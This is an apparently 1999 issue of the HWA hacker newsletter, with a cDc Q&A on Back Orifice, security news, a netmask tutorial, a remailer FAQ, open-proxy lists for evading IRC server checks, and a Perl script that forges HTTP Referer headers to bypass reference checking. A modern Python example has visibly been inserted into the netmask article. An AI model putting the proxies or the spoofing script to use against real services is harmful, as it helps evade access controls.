I've always wondered... what does a group that produces "script kiddie material" (no offense intended, it's inevitable whether you want it or not) feel about their work? Every now and then I'm plagued by contact with an "3R33+ H@X0R", who is most likely some 14 year old without anything better to do who is causing some minor damage, without a clue as to what a TCP/IP packet is. The ratio of clueful hackers cracking to script kiddies cracking has gone way down over the last few years, and products like BO are likely to blame. So what do you guys think about this... would you rather this turned around, or do you feel that distributing tools to nameless masses is a good method of getting back at the real evils?

cDc answers:

Obscure Images answers: There will always be people who ride on the work of others. That's all that script kiddies are, poseurs, trendies or what have you. Back in the old days after War Games came out there were floods of "hackers" out there and these same comments were made. In the end, there is always a shakeout process. Most of the current script kiddies will abandon their activities, leaving the hardcore still in place.
--
Reid Fleming answers: I suggest reading the section on Evolutionarily Stable Strategies in The Selfish Gene.
--
G. Ratte' answers: It's tricky, and I refuse to get into the kind of age/experience penis-size wars that always come up with this "lamers are running around with dangerous scripts" thing. Back Orifice is distributed the way it is to force an issue. A hell of a lot of people should be upset their computers are wide open. I've always hoped that people interested in our tools would seek out our other material and read up on what we're about. And that they'd be smart enough to figure out that bumming some hapless person's day by screwing up their computer is not a good way to spend an afternoon. The end of all our text files from the last few years says this: "Save yourself, go outside, DO SOMETHING!"
--
Nighstalker answers: Virtually anything can be used for evil, as virtually anything can be used for good. One thing about BO2K is that the author deliberately made it more difficult for clueless script kiddies to use. They're the ones who constantly plague us with badly mis-spelled complaints about how BO2K doesn't work. The IT professionals sing our praises about the power and ease of use of BO2K. BO2K is forcing evolution to accelerate in the world of computer security. We regret the damage that is done with BO2K. In the long run, we will all be the better for this.
--
Tequila Willy answers: I think you have raised an excellent question. However, I am doubtful that good products like BO can be identified as the cause of the diminishing number of hackers in comparison to the number of script kiddies. I believe that each individual must take responsibility for the character traits that they choose to cultivate in themselves.
If the number of script kiddies continues to grow and more individuals choose to take the path of becoming a script kiddie rather than pursuing hacking skills, then this seems more plausibly interpreted as a sign of laziness or a short attention span on the part of those who choose this path. I don't think that BO could be blamed for such a result. That being said, I would prefer to see more hackers than script kiddies but only because I respect the skills of hackers more than the skills of script kiddies. And I would rather participate in a society populated by individuals I can respect. However, I believe your question should lead us to thinking more about what sort of behaviors should or should not be tolerated in cyberspace. And before we can address that question, it would first be helpful to conduct an inquiry into the metaphysics of hacking. I believe that many of the laws regarding computer security issues are misguided because they make fundamental assumptions about the nature of the computer hacking environment that simply are erroneous.
--
Tweety Fish answers: The ratio might have changed, but the total number of people with a clue has increased, not decreased. Some 14 year old might get their start by messing with bo2k at school, and then they might start writing plugins, and then they might need to do something stranger, so they'll mod netcat to suit their needs, and then they might realize how horribly insecure their own system is, and install linux or freeBSD to mitigate that somewhat, and then they might get out of school and go get a job securing corporate networks with all the knowledge they've gained. Kids will be kids. If computer security was a real priority for operating system vendors, Joe Random 14 year old would need a lot more than something as general purpose as BO2K to start trouble. He'd need... uh... a car, say, or some bleach and ammonia, or a lot of beer.
yoshi asks:

What should application and OS designers do to build systems which are more secure?

cDc answers:

Reid Fleming answers: For starters, they should spend more time and energy on security than UI design, documentation, or product packaging.
--
Nighstalker answers: Learn from the mistakes of the past and the solutions of today. It's not that hard to implement security. It's just easier for lazy coders and indifferent beancounters to blow it off by saying that, "This is not something our customers are demanding in our product."
--
Dildog answers: Proactive security measures. Encrypt everything. Eliminate HTTP and go right to HTTPS everywhere.
--
Tweety Fish answers: Make security concerns and security audits an integral part of the development.

Alpha42 asks:

Okay.. Here's my question.. what ever happened to Obscure Images?! I haven't seen anything from him in AGES... Don't get me wrong, I thought BO was good and all, and I'm sure it's generated 99% of the PR lately.. but I miss the original cDc stuff.. the files! :) And Obscure?! OH man...

cDc answers:

Obscure Images answers: Hey, I'm still here, and I am as active as I have ever been. I've never been gone, just acting back in the shadows. I do what I can to help plan and implement our projects. Most of it comes without the glory or press attention, but it has to be done for us to be successful. Over the past 10 years I've gone to school, gone out into the world, gotten married, and started to go a bit grey. Not related to my marriage, I assure you. There will be more files from me, it's just a matter of finishing them. Keep your eyes open, your mouths too. As far as my poetry goes, I have an excuse. It was 10 years ago, I was a typical late teen with clinical depression and the idea that I could write poetry. I stand by my stories, but would rather see the poems fade away like my youth. Oh yeah, you have seen me, every time you see our Paramedia Cross logo.
--
Tweety Fish answers: Near the end of the cold war, Obscure Images was captured by a splinter faction of the KGB, and forced to write polemics, in verse, in a futile attempt to turn the people of the former Soviet Union back on the true path to communism. He's back now, and doing fine, except for that twitch.

Effugas asks:

What tools, in your minds, would you consider the most useful but least acknowledged tool in your security analysis collection? When backed into a corner, unsure how to whip something into shape, what obscure and strange network (or even non-network!) utility popped into mind and either performed some amazing function you couldn't imagine coding yourself or gave you the necessary cluephone ringing (via source code peek) to pull it off yourself?

cDc answers:

DilDog answers: lsof. Use it.

Anonymous Coward asks:

My question is simple: When will you start to do productive things? Ok, here is some context for the question. I know about BO2K; and saw miscellaneous software at cDc site. But on the other hand, the cDc has existed much longer than Linux itself, the FreeBSD team, NetBSD, and for probably as long as the FSF itself. On one hand you have a wealth of software (for instance here or here), on the other hand, after 15 years, you have a handful of cracking tools, one Windows administration package, an unorganized set of information, and stickers + temporary tattoos for sale. In particular, it is a total mystery why since all that time, you haven't done one of the following: Review, summarize existing security systems, document and implement a robust security model. Unix model is total crap; even Multics (design: 1963) was better (Multics achieved B2 security rating). Audit publicly a freely available Unix (today done by OpenBSD instead). Write automatic assembly code analyzer to search for bugs (or at least for C).
Commercial tools exist by now, and last time I tried to see if a free one existed, all I could find on cDc site was a "Tao of Windows Buffer Overflow" (a re-hash of techniques found for instance in Morris' Internet Worm in 1988. See Spafford's excellent report, and the Worm's FAQ). Lend a bunch of your machines, to hold contests such as "the best security model for Linux/BSD, running almost all possible services/servers, CGI, ...". In this context, when will you stop selling temporary tattoos, and start real programming (other than BO2K)?

cDc answers:

Obscure Images answers: While cDc does some programming, this is not the sole focus of our efforts. To compare us to the other groups you mention you have to realize that we have different goals, as well as methods. We don't feel obligated to do anything for anyone. Our work is directed by our desires and our goals, not the desires of the community. Everything we do is productive in our eyes. We like to think that we've done work every bit as important as any of the above groups. It's all a matter of perspective. We have no problem with the people who have given their time and energy to these other projects, but we are not like them. We do things when we want to, in the way that we want to.
--
Reid Fleming answers: Temporary tattoos are a CRITICAL ELEMENT of our security strategy. To suggest otherwise is sheer lunacy.
--
G. Ratte' answers: Wow. I don't know when I'm going to be productive. Mom wants grandkids, too. Why should we do those things? Maybe we will, maybe we won't. Why don't you? We do other things. As far as "lend a bunch of your machines to hold contests..." that's funny, what bunch of machines? None of us are wealthy. You looked at our site and blew it off as a "handful of cracking tools & an unorganized bunch of information." That's the first electronic magazine ever, starting in 1984.
It was a big deal to me when I was fourteen and bored in a small town, and I was doing something new and exciting and fun. I don't necessarily want to satisfy your weird little computer fetishes. I've got a dog and a cat and a screwy relationship and my picture in SPIN and no job and I'm busy. Too busy for you. To quote from cDc #300:

THE POINT
by Bryan O'Sullivan

you could spend an hour
counting the petals in a flower
it might take you a year
to count the veins in each petal
if you spent ten lifetimes,
maybe you could count its cells
but you'd have completely missed the point
you fuckhead

--
Nighstalker answers: And this comes back to my first answer. cDc is NOT ABOUT PROGRAMMING! Programming and computers are only a means to an end.
--
Tequila Willy answers: Dear Anonymous Coward, Your question seems very serious and as such seems to be counter productive. The Cult of the Dead Cow exemplifies the very attitude that ought to be cultivated considering the absurd nature of existence. Take a moment to contemplate your death and your own concerns about what counts as productive behavior may shift. You may think to yourself, "I am merely a mortal who will die, but I must live responsibly for the sake of those who will survive me." But of course your friends and family will die and there will come a time when no one alive will even have a memory of your existence. And if that weren't enough, at some point our own Sun will supernova, and when this occurs, human life on earth will be destroyed. At that point, human beings will not even exist to contemplate the fates of those like yourself who died long ago. From this perspective, all human actions seem to take on an equal importance: our concerns are absurd! To live freely and responsibly, a mature human being must realize this point.
Having fun, living and loving well, being playful (and hence flexible in your living): these actions take on much greater importance than behaving in a serious (and hence rigid) manner. Your question is foolish because it is not asked with a foolish spirit.
--
Tweety Fish answers: Read our files. Read our press releases. It's all about style, jackass. Incidentally, the first of your suggestions is a primary goal of the OpenBSD project, like you said. The second suggestion is a fine idea, why don't you do it? (re: spafford's paper and the internet worm, the internet worm didn't run on win32, now, did it?). As for the third suggestion, gee, that's a great idea. Why don't we kick down a couple hundred thousand for a semi-trailer we can turn into the cDc hackmobile, and load it up with all these high-end systems we have sitting around, and hire somebody to drive it around the country so people can mess with it for free! We do what we're interested in, what's fun, and what's within our resources, plain and simple. And we try to keep it funny.

Descriptions of who these people are are at http://www.cultdeadcow.com/members/.

@HWA

48.0 Buffer Overflow in Communicator May Allow Code to Run
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by Weld Pond
Another buffer overflow in the Windows version of Netscape Communicator has been discovered. This one deals with incorrect bounds-checking in dynamic font support. Example exploit code is available and confirms the overflow on NT 4.0 using Netscape 4.61 and 4.7. It should be possible to use this exploit to execute arbitrary code.
White Hats
http://www.whitehats.com/browsers/maxvisioncrash47/index.html

@HWA

49.0 Listserver hacked
     ~~~~~~~~~~~~~~~~~

From http://www.403-security.org/
http://www.it.fairfax.com.au/breaking/19991021/A1636-1999Oct21.html

Update: Evidence points to listserver hack
14:59 Thursday 21 October 1999
By NATHAN COCHRANE

A PRESS release announcement e-mail listserver attached to the Federal Department of Communications, IT and the Arts appears to have been hacked.

Several e-mails purporting to be from the department have arrived in reporters' mail boxes this afternoon, almost perfect duplicates of announcements sent earlier in the day about a postal code of practice.

However, the sending address was from an anonymous remailer, Replay.com, based in the Netherlands and the e-mails did not contain a subject line.

Subtle changes were made to the apparently hacked e-mails, including a pointer to a nonexistent Web page on the DCITA official site and a notice asking those seeking to remove themselves from the mailing list to send a message to a provocative, non-existent address.

A spokesman for the Minister, Senator Alston, was unavailable for comment.

Roddy Strachan, a Melbourne expert in Linux majordomo list group systems, said it appeared the server had been incorrectly configured, allowing a hacker in through an insecure default setting.

"Well, the way I have set up our mailing list program, is that people who aren't subscribed can't post to the list," Strachan said. "And the admin has to approve all posts before it goes out to the recipients. This stops the hassle of bouncing mailers, etc.

"Looking at the message it should say majordomo@blah and using Replay.com is very suss. Even the URL, the 'path=1234', just looks like a made-up piece of nonsense."

Replay.com specialises in providing anonymous remailing services, cryptographic products including Pretty Good Privacy, books on cracking security systems like DES, and secure Linux distributions.
@HWA

50.0 Skewl: "How a Netmask Works" By Steven Lee
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

How a netmask works.
_________________________________________________________________

Preface

I've been using the internet for several years now. When I set up my first SLIP connection, I waded through mountains of cryptic information that I barely understood. One of the pieces of information that I really didn't understand at all was how a netmask worked. I just took it on faith that it made sense and used whatever numbers someone gave me. I finally found a reference that (almost) described how a netmask works. Armed with a near description, I sat down with a scientific calculator (I can't convert decimal to binary and back in my head) and figured out what the description meant. Since this has been a hole in my knowledge, and all the references I have seen don't spell it out, I decided to see if I can explain it and add to the pool of knowledge so you won't have to go through my process to discover this.
_________________________________________________________________

There are three pieces of information that interact with each other to resolve IP addressing. They are the netmask, the IP address, and the network address. As you may already know, when an IP packet is sent to a foreign address (off of this local network) the network address is all that is used for routing purposes until the packet reaches the target network. At this point the whole IP address is used to determine the specific machine on this network to send the packet to, based on local routing tables or dynamic ARP (address resolution protocol, which we will not cover here).

In order for a router to know the network address, it uses the IP address and the netmask. Here's the relationship:

Your network address is your IP address masked (bitwise AND) with your netmask.

This may mean nothing to you without the following clarification. Let's use an example.
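Before the article's own worked examples, here is the AND rule just stated as an added Python example (this code is not part of Steven Lee's article; every function name in it is my own). It goes a little beyond the article: it also rejects a netmask whose 1 bits are not contiguous, derives the prefix length and broadcast address, and makes the local-versus-foreign decision the article describes a router making.

```python
# Added example, not from Steven Lee's article. Dotted-quad helpers plus the
# "network address = IP AND netmask" rule, with the checks a practitioner
# wants around it. All names here are the example's own.

def dotted_to_int(addr):
    """Parse a dotted quad such as '198.139.158.55' into a 32-bit integer."""
    parts = addr.split(".")
    if len(parts) != 4:
        raise ValueError("expected four octets: %r" % addr)
    value = 0
    for part in parts:
        octet = int(part)
        if not 0 <= octet <= 255:
            raise ValueError("octet out of range: %r" % addr)
        value = (value << 8) | octet
    return value

def int_to_dotted(value):
    """Inverse of dotted_to_int."""
    return ".".join(str((value >> shift) & 0xFF) for shift in (24, 16, 8, 0))

def to_binary(value):
    """The article's 'Binary' column: four 8-bit groups, most significant first."""
    return " ".join(format((value >> shift) & 0xFF, "08b") for shift in (24, 16, 8, 0))

def prefix_length(mask):
    """Count the leading 1 bits of a netmask (255.255.255.224 -> 27).

    A mask whose 1 bits are not contiguous (e.g. 255.255.0.255) still ANDs
    "fine", but no router or host stack will accept it, so reject it here.
    """
    m = dotted_to_int(mask)
    ones = bin(m).count("1")
    contiguous = (0xFFFFFFFF << (32 - ones)) & 0xFFFFFFFF
    if m != contiguous:
        raise ValueError("non-contiguous netmask: %s" % mask)
    return ones

def network_address(ip, mask):
    """Network address = IP address AND netmask, exactly as the article says."""
    prefix_length(mask)  # validate the mask before using it
    return int_to_dotted(dotted_to_int(ip) & dotted_to_int(mask))

def broadcast_address(ip, mask):
    """Network address with every host bit (the mask's 0 bits) set to 1."""
    m = dotted_to_int(mask)
    return int_to_dotted((dotted_to_int(ip) & m) | (~m & 0xFFFFFFFF))

def same_network(ip_a, ip_b, mask):
    """The router's decision: a destination whose masked address differs
    from ours is 'foreign' and must be handed to the router."""
    return network_address(ip_a, mask) == network_address(ip_b, mask)

def explain(ip, mask):
    """Reproduce the article's three-row Decimal/Binary chart as text."""
    rows = [("The IP address:", ip),
            ("The netmask:", mask),
            ("The Network address:", network_address(ip, mask))]
    return "\n".join("%-22s %-16s %s" % (label, val, to_binary(dotted_to_int(val)))
                     for label, val in rows)

if __name__ == "__main__":
    print(explain("198.139.158.55", "255.255.255.224"))
    print("prefix length: /%d" % prefix_length("255.255.255.224"))
    print("broadcast:     %s" % broadcast_address("198.139.158.55", "255.255.255.224"))
```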
If your netmask is:       255.255.255.0
and your IP address is:   198.139.158.3
_________________________________________________________________
your Network address is:  198.139.158.0

If you were in a subnetted environment you might have:

If your netmask is:       255.255.255.224
and your IP address is:   198.139.158.55
_________________________________________________________________
your Network address is:  198.139.158.32

This still only alludes to the "secret" of the netmask. To shed light on the second example, let's take a look at the meaning of the netmask. We are going to convert the decimal notation (4 octets) to binary notation. The 1's in the netmask will imply the value "true", while the 0's will imply the value "false". The true values will be allowed to pass through the netmask and the false values will not. The netmask acts as a filter.

                               Decimal           Binary
The IP address:                198.139.158.55    11000110 10001011 10011110 00110111
The netmask:                   255.255.255.224   11111111 11111111 11111111 11100000
The Network address would be:  198.139.158.32    11000110 10001011 10011110 00100000

In the above chart, you can see in the binary column that whenever the netmask value is 0, the network address also has a value of 0. Whenever the netmask has a value of 1, the corresponding network address takes its value from the IP address. Try looking down from the IP address, to the netmask, then to the network address, digit by digit.

I hope this clarifies it for you.

Produced by: Steven Lee, steven@main.nc.us

@HWA

51.0 More proxies supplied by IRC 4 ALL
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Sourced by sAs- (sas2@usa.net)

A lot of these servers work and are fresh; I've used them successfully on IRC. I won't mention which servers you can use that don't require IDENT or check for OPEN PROXIES, but they are out there! Suggestion: do a /links and go thru the list until you find a server that will let you on.
- Ed

http://www.lightspeed.de/irc4all/index.htm

Port   Wingate service
~~~~   ~~~~~~~~~~~~~~~~~~~~~~
21     FTP Proxy Server
23     Telnet Proxy Server
53     DNS Proxy Server
80     WWW Proxy Server
110    POP3 Proxy Server
808    Remote Control Service
1080   SOCKS Proxy Server
1090   Real Audio Proxy Server
7000   VDOlive Proxy Server
8000   XDMA Proxy Server
8010   Log Service

Telnet/SOCKS (wingate etc) Proxies;
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

(C) Paradox paradox@cyberjunkie.com

Check the pages for more proxies/updates...
http://www.lightspeed.de/irc4all/index.htm

Other proxies;
~~~~~~~~~~~~~

Sourced by sAs-
From http://proxys4all.cgi.net/public.html

Magus Net Anonymous Proxy [.com - USA]
www.magusnet.com

The Magus Net proxy is a great free public proxy server based in Arizona, USA. It can be quite busy and can be slow or down some times. They provide free HTTP, FTP, WAIS and GOPHER proxy service and also offer a pay service for SSL & SSH, and now have added a demo for SSL. The Magus Net DeleGate proxy can be used in your browser settings or manually in the URL window. It also allows chaining before and after their proxy:

Example HTTP: http://magusnet.com:8084/-_-http://www.destination.domain
Example FTP:  http://magusnet.com:8084/-_-ftp://ftp.destination.domain

- Currently active ports: 3128,8081,8082,8083,9000,10080

3128  - Local - Access by Account Holders Only
8081  - Local - Public Access
8082  - Chained thru Ringer DeleGate Proxy in Japan
8083  - Chained thru NRL Onion Router in US - Operated by US.Navy
8084  - WAS chained thru Lucent Personal WWW Assistant in US
        LPWA has gone pay-only (proxymate.com). Port closed July 14, 1999
        See http://www.lpwa.com for details.
9000  - Local - Encrypts with SSL between your browser and this Proxy
10080 - Local - Public Access

Magus Net proxy hosts can also be reached as: magusnet.gilbert.az.us

Junkbuster Proxy Services [.com -USA]
www.junkbuster.com

The Internet Junkbuster Proxy blocks unwanted banner ads and protects your privacy from cookies and other threats. It's free and runs under Windows 95/98/NT and a variety of UNIX-like systems. It works with almost any browser. Installation typically takes minutes.

JunkBuster Proxys:
~~~~~~~~~~~~~~~~~~

Web-based CGI proxies;
~~~~~~~~~~~~~~~~~~~~~~
http://proxys4all.cgi.net/web-based.html

Telnet/SOCKS proxies;
~~~~~~~~~~~~~~~~~~~~~
(wingates, all port 23)

I keep hoping to have more for you all, but as fast as I can get them they tend to die. Best bet is always to scan your own. These have not all been tested yet.
Copyright ©1998-99 Proxys 4 All

@HWA

52.0 Perl source for a webspoofing HTTP grabber
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Sourced by sAs- From http://proxys4all.cgi.net/files/webspf.pl

#!/usr/bin/perl
#
# Web Spoof
# Pavel Aubuchon-Mendoza [admin@deviance.org][http://www.deviance.org]
#
# Summary:
# Works as a normal command line web retrieval script,
# except will spoof the referer. This can be left to the script to do,
# or specified in the command line. This will bypass any kind of reference
# checking, in most cases. Will also screw up the REMOTE_HOST variable which
# some cgi scripts use, but the correct IP will of course be sent. Default
# browser is Netscape 4.5 under Win95. This can be changed in the script.
#
# Usage: - default output is standard out, to save to a file
#          you will need to redirect it, especially for
#          binary/image files -
#
# ./webspf.pl [file]
#
# Examples:
#
# ./webspf.pl language.perl.com/info/software.html > software.html
#   - referer would be language.perl.com/info/index.html -
#
# ./webspf.pl www.linux.org/images/logo/linuxorg.gif > penguin.gif
#   - referer would be www.linux.org/images/logo/index.html -
#
# ./webspf.pl www.linux.org/ www.freebsd.org/whatever.html > index.html
#   - referer would be www.freebsd.org/whatever.html -
#
#

use IO::Socket;

$loc  = $ARGV[0];                               # www.a.com/test.html
$temp = reverse($loc);                          # lmth.tset/moc.a.www
$host = substr($temp,rindex($temp,"\/")+1);     # moc.a.www
$host = reverse($host);                         # www.a.com
$dir  = substr($loc,index($loc,"\/"));          # /test.html
$referer = $ARGV[1];                            #
if($referer eq "") {                            # true
  # keep the slash so the reversed string ends in "/" (no +1 here,
  # otherwise the default referer would come out as "www.a.comindex.html")
  $temp = substr($temp,index($temp,"\/"));      # /moc.a.www
  $temp = reverse($temp);                       # www.a.com/
  $referer = $temp . "index\.html";             # www.a.com/index.html
}                                               # spoofed referer!

print STDERR "\nWebSpoof v1.0 : 12/18/1998\n";
print STDERR "Pavel Aubuchon-Mendoza + http://www.deviance.org\n\n";

$res = 0;
$handle = IO::Socket::INET->new(Proto => "tcp", PeerAddr => $host, PeerPort => 80) or $res = 1;

if($res eq 0) {
  $handle->autoflush(1);
  print STDERR "\[Connected to $host\]\n";
  print $handle "GET $dir HTTP/1.0\n";
  print $handle "Referer: $referer\n";
  print $handle "Connection: Close\n";
  print $handle "User-Agent: Mozilla\/4.5 [en] \(Win95\; I\)\n";
  print $handle "Host: $host\n";
  print $handle "Accept: image\/gif\, image\/x-xbitmap\, image\/jpeg\, image\/pjpeg\, image\/png\, *\/*\n";
  print $handle "Accept-Encoding: gzip\n";
  print $handle "Accept-Language: en\n";
  print $handle "Accept-Charset: iso-8859-1\,\*\,utf-8\n\n";

  while($temp ne "") {                          # read some headers
    $temp = <$handle>;
    chop($temp);chop($temp);                    # strip the trailing CR LF
    @sort = split(/:/,$temp);
    if($sort[0] =~ /server/i)  { print STDERR "  \[$temp\]\n"; }
    if($sort[0] =~ /date/i)    { print STDERR "  \[$temp\]\n"; }
    if($sort[0] =~ /content/i) { print STDERR "  \[$temp\]\n"; }
  }

  print STDERR "\[Receiving data\]\n";
  binmode(STDOUT);
  while(<$handle>) { print "$_"; }
  close($handle);
  print STDERR "\[Connection Closed\]\n";
} else {
  print STDERR "\[Could not connect to $host\]\n";
}

@HWA

53.0 MACMILLAN USA MOVES TO SECURE LINUX
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNS http://www.net-security.org/

by Thejian, Saturday 23rd October 1999 on 1:25 pm CET

MacMillan Publishing USA has entered into a strategic alliance with SecurityPortal.com to bring online security technologies to users of the Linux operating system (OS). The new product, Maximum Security Linux, will be jointly released to provide administrators who run Linux with security-related capabilities such as intrusion detection, system auditing and monitoring along with virus protection.
The package suite will bundle a wide range of security software made available through the GNU General Public License (GPL), and will provide access to "best practices" FAQs, policy guides and various security tips.

http://www.ecommercetimes.com/news/articles/991022-7.shtml

MacMillan USA Moves To Secure Linux
By Matthew W. Beale
E-Commerce Times
October 22, 1999

MacMillan Publishing USA has entered into a strategic alliance with SecurityPortal.com to bring online security technologies to users of the Linux operating system (OS). The new product, Maximum Security Linux, will be jointly released to provide administrators who run Linux with security-related capabilities such as intrusion detection, system auditing and monitoring along with virus protection.

The package suite will bundle a wide range of security software made available through the GNU General Public License (GPL), and will provide access to "best practices" FAQs, policy guides and various security tips.

"MacMillan's retail distribution and SecurityPortal's security knowledge makes for a great partnership," commented Steve Schafer, Sr., title manager for Macmillan's Linux software. "Getting this knowledge and these tools into the hands of the Linux user is essential to help ensure the security of the many personal and corporate Linux systems being installed every day."

Rising Security Threats

Jim Reavis, SecurityPortal.com Webmaster, designed the product in response to "the ever increasing size and complexity of networked software, combined with the sophistication of today's hackers." He added that Internet professionals need to more seriously consider securing their operations, pointing out that "we are more exposed to security threats than at any other time."

There are some 12 million Linux users worldwide, according to International Data Corp. (IDC). Those numbers alone, say industry analysts, should serve as incentive for companies to move into the relatively quiet Linux security solutions market.
Maximum Secure Linux works with systems running the Linux kernel version 2.2.5 or higher. Internet security information provider SecurityPortal.com also offers "technotes" and opinion pieces from IT security experts, security-related news and links to security alerts, tools and other resources.

The third largest operating system provider after Microsoft and Apple, MacMillan offers The Complete Linux OS, a Linux distribution by MandrakeSoft that is based on Red Hat. Establishing an early strategic relationship with Red Hat, Inc., MacMillan has been involved with the Linux community for almost four years.

E-Commerce Security

Linux is increasingly being deployed by e-commerce operations, and IDC numbers show that the open-source environment captured more than 17 percent of all server shipments last year.

Security concerns among e-commerce professionals, including those working with Linux-based systems, are sometimes justified. A study conducted by Information Security Magazine earlier this year indicated that e-commerce operations are 57 percent more likely to experience a security breach than other online sites. Additionally, e-commerce sites are 24 percent more likely to be the target of a hacker/cracker attack.

@HWA

54.0 ANONYMOUS REMAILERS
~~~~~~~~~~~~~~~~~~~~~~~~

From HNS http://www.net-security.org/

by BHZ, Saturday 23rd October 1999 on 2:56 am CET

"A remailer is a computer service that privatizes your e-mail. This is in sharp contrast to most Internet Service Providers and corporate e-mail providers, which are terribly non private." Interested in them? Read the Remailer FAQ.

http://www.andrebacard.com/remail.html

Anonymous Remailer FAQ
by André Bacard, Author of Computer Privacy Handbook
("The Scariest Computer Book of the Year")
[Updated 1 September 1999]

[This article offers a nontechnical overview of "remailers" to help you decide whether to use these computer services. Links at will connect you with specific remailers.
I have written this especially for persons with a sense of humor. You may distribute this (unaltered) FAQ for non-commercial purposes. Copyright 1999 by André Bacard].

What is a remailer?

A remailer is a computer service that privatizes your e-mail. This is in sharp contrast to most Internet Service Providers and corporate e-mail providers, which are terribly unprivate. Traditionally, a remailer allowed you to send electronic mail to a Usenet news group or to a person without the recipient knowing your true name or your e-mail address. Today, a new variety of web-based remailers permits you to send mail using your real name (if you wish), while protecting your email records from the snooping eyes of your Internet Service Provider.

In the first version of this FAQ (published in 1995), all popular remailers were free-of-charge. Today, a number of services either charge user fees, or support themselves via advertisers.

Why would YOU use remailers?

Maybe you're a computer engineer who wants to express opinions about computer products, opinions that your employer might hold against you. Possibly you live in a community that is violently intolerant of your social, political, or religious views. Perhaps you're seeking employment via the Internet and you don't want to jeopardize your present job. Possibly you want to place personal ads. Perchance you're a whistle-blower afraid of retaliation. Conceivably you feel that, if you criticize your government, Big Brother will monitor you. Maybe you don't want people "spamming" or "flaming" your corporate e-mail address. In short, there are many legitimate reasons why you, a law abiding person, might use remailers.

How does a remailer work?

Let's take an imaginary example. Suppose that a battered woman, Susan, wants to post a message crying out for help. How can Susan post her message and receive responses confidentially? She might use a "pseudo-anonymous" remailer run by Andre Bacard called the "Bacard.com" remailer.
(This remailer is fictitious!) If she wrote to me, my "bacard.com" computer would STRIP AWAY Susan's real name and address (the header at the top of Susan's e-mail), replace this data with a dummy address (for example, and forward Susan's message to the newsgroup or person of Susan's choice. Also, my computer would automatically notify Susan that her message had been forwarded under her new identity . Suppose that Debbie responds to Susan. My computer will STRIP AWAY Debbie's real name and address, give Debbie a new identity, and forward the message to Susan. This process protects everyone's privacy. This process is tedious for a person but easy for a computer.

Are there many remailers?

The good news... Yes, there are dozens of popular remailers. The bad news... Remailers tend to come and go. First, they require equipment and labor to set up and maintain. Second, a minority of individuals who use remailers are a pain in the neck. These selfish persons drive remailer operators into early retirement. Third, many remailer owners tire of losing money. I hope that we are entering an era of financially profitable remailers. This profitability will permit better reliability and stability.

If you live and breathe computers, the best place to keep in touch with the Art & Science of remailers is at the Usenet newsgroup . If you don't know the difference between a bite and a bit, I recommend you simply study the remailers found at my web site.

Why are some remailers free, while others charge fees?

In the beginning, all remailers were free to users (but not to the people who ran them!). How could a remailer administrator charge people who wanted maximum privacy? How could administrators ask for a credit card number or take checks? Several years ago, there was no technical solution to these problems. In 1995, I wrote: "In the future, remailer operators might charge for their services. Privacy is valuable. For example, offshore banking is one of the world's biggest businesses.
It is easy to imagine Remailer, ETC., a cyberspace company that goes beyond Mailbox, ETC. (the existing company which rents snail mail boxes). In order for remailers to become commercial on a big scale, anonymous payment systems such as DigiCash must become popular." My predictions came true. Today, many remailer operators charge fees for the same reason that you go to work in order to pay for food, housing, etc.

Why do people operate remailers, if not for money?

Why does André Bacard spend hours writing FAQs? Why do some people volunteer to help others? Some people set up remailers for their own personal usage, which they may or may not care to share with the rest of us. Some persons are educators or activists.

Joshua Quittner, co-author of the high-tech thriller Mother's Day, interviewed Mr. Julf Helsingius for Wired magazine. Helsingius, who ran the world's most popular remailer for three years until he retired on August 30, 1996, said:

"It's important to be able to express certain views without everyone knowing who you are. One of the best examples was the great debate about Caller ID on phones. People were really upset that the person at the receiving end would know who was calling. On things like telephones, people take for granted the fact that they can be anonymous if they want to and they get really upset if people take that away. I think the same thing applies for e-mail. Living in Finland, I got a pretty close view of how things were in the former Soviet Union. If you actually owned a photocopier or even a typewriter there you would have to register it and they would take samples of what your typewriter would put out so they could identify it later. That's something I find so appalling. The fact that you have to register every means of providing information to the public sort of parallels it, like saying you have to sign everything on the Net. We always have to be able to track you down".
What is the difference between a "pseudo-anonymous" and an "anonymous" remailer?

Most people use the expression "anonymous remailer" as short hand for both types of remailers. This causes confusion!

A "PSEUDO anonymous" remailer is basically an account that you open with a remailer operator. The fictitious Bacard.com (described above) is a PSEUDO-anonymous remailer. This means that I, the operator, and my assistants KNOW your real e-mail address. Your privacy is as good as the remailer operator's power and integrity to protect your records. In practice, what does this mean? Someone might get a court order to force a PSEUDO anonymous remailer operator to reveal your true identity. The Finnish police forced Julf Helsingius to reveal at least one person's true identity. The advantage of most PSEUDO-anonymous remailers is that they are user-friendly. If you can send e-mail, you can probably understand PSEUDO anonymous remailers. The price you pay for ease of use is less security.

Truly ANONYMOUS remailers are a different animal. The good news... They provide much more privacy than PSEUDO anonymous remailers. The bad news... They are much harder to use than their PSEUDO anonymous cousins. There are basically two types of ANONYMOUS remailers. They are called "Cypherpunk remailers" and Lance Cottrell's "Mixmaster remailers". Note that I refer to remailers in the plural. If you want maximum privacy, you should send your message through two or more remailers. If done properly, you can ensure that NOBODY (no remailer operator or any snoop) can read both your real name and your message. This is the real meaning of ANONYMOUS. In practice, nobody can force an ANONYMOUS remailer operator to reveal your identity, because the operator has NO CLUE who you are! For 99% of the Internet public, the PSEUDO anonymous remailers at my web site are more than adequate.

What are the newest trends in remailers?

Web-based remailers are very popular.
This trend was fueled, in part, by Microsoft's and Yahoo!'s services. Web-based services enable you to check your email via the Internet wherever you might be, for example at a public library. For security purposes, a movement is catching on to move remailers "offshore", in particular to the Caribbean. The United States Congress (and its enforcers -- the NSA, CIA, FBI, IRS, etc) is, by far, the world's most aggressive opponent of privacy. For many reasons, privacy can be increased by operating outside the United States.

What makes an "ideal" remailer?

An "ideal" remailer:
(a) Is easy to use.
(b) Is operated by reliable persons.
(c) Uses PGP or other high-level encryption,
(d) Allows you to read your email without forwarding it to your Internet Service Provider,
(e) Is owned and operated outside the United States, and
(f) Allows security experts and computer enthusiasts to examine its computer source code.

